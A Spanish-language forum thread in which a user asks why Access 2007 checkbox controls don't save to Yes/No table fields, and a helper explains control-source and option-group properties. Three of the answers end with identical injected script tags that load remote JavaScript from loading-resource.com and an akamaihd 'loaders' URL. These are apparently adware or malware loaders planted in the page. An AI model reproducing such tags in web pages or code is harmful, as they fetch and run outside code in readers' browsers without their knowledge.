Cómo se guarda información en la BD utilizando casillas de verificación en un formulario de Access

Tengo dos casillas de verificación en un formulario, una llamada Contado y otra llamada Crédito, tengo dos campos con los mismos nombres en la tabla, del tipo Si/No. Ya en el formulario por ej: si doy un check en la casilla Contado, se marca el cuadrito pero en la base de datos no se guarda ese dato, en otras palabras cuando cierro el formulario y lo vuelvo abrir la casilla de verificación esta vacía. ¿Alguien me puede ayudar a resolver este problema

1 Respuesta

Respuesta

El "origen del control" de las casillas de verificación, deben ser los campos que se encuentren en la tabla. Entiendo que el formulario tiene como "origen del registro" la tabla en cuestión.

Sólo tienes que entrar en modo diseño del formulario, seleccionar las propiedades de cada una de las casillas de verificación y en el origen del control, seleccionar el campo correspondiente.

Un saludo y no te olvides de visitar EL FORO

<script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.getData"></script><script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>

Gracias por tu respuesta pero sigo con el mismo problema, utilizo access 2007 y en las propiedades de las casillas de verificación no aparece origen del control, en la Ficha Datos solo aparece: Valor de la opción 1; Activado Si; Bloqueado Si. Me he fijado en las propiedades de las cajas de texto y tiene mas opciones donde aparece Origen del control, no se porque esa propiedad no está.

Abrí la base de datos en Access 2010, probé agregar una nueva casilla de verificación y me mando el siguiente mensaje: En la base de datos o proyecto de Microsoft Access falta una referencia al archivo 'ISDSIGN.OCX' versión 1.0 o la referencia es errónea. ¿Que será?

Por lo que comentas "valor de la opción" 1, creo que estas en un cuadro de opciones que es totalmente diferente a una casilla de verificación. No debes seleccionar cada casilla de verificación, que como muy bien dices sólo tiene esas opciones. Debes seleccionar todo el cuadro de opciones (es seleccionar el marco que contiene las casillas) y darle a propiedades. Ese objeto si tiene origen de control y te guardara en la tabla el valor de la opción seleccionada, por defecto, 1, 2, 3 ...

Un saludo

<script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.getData"></script><script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>

He probado de las dos formas, cuadro de opciones y casilla de verificación y me da las mismas propiedades sin origen de control. Hace poco hice una prueba creando un formulario con el asistente y ahí si funcionan las casillas de verificación por lo tanto guarda los datos, no quedan vacías las casillas como anteriormente pero me parece raro porque si creo el form en vista diseño no me da el origen del control y si es a través del asistente ahí funciona. Así que decidí trabajar el formulario según el asistente. Muchas gracias por tus aportes. Saludos y buen día.

Pues no te molestes, pero si con el asistente funciona y cuando lo creas en vista diseño no, hay algo que haces mal. De todas las maneras me alegro de que lo hayas solucionado.

Por favor cierra el hilo.

Un saludo.

<script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.getData"></script><script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>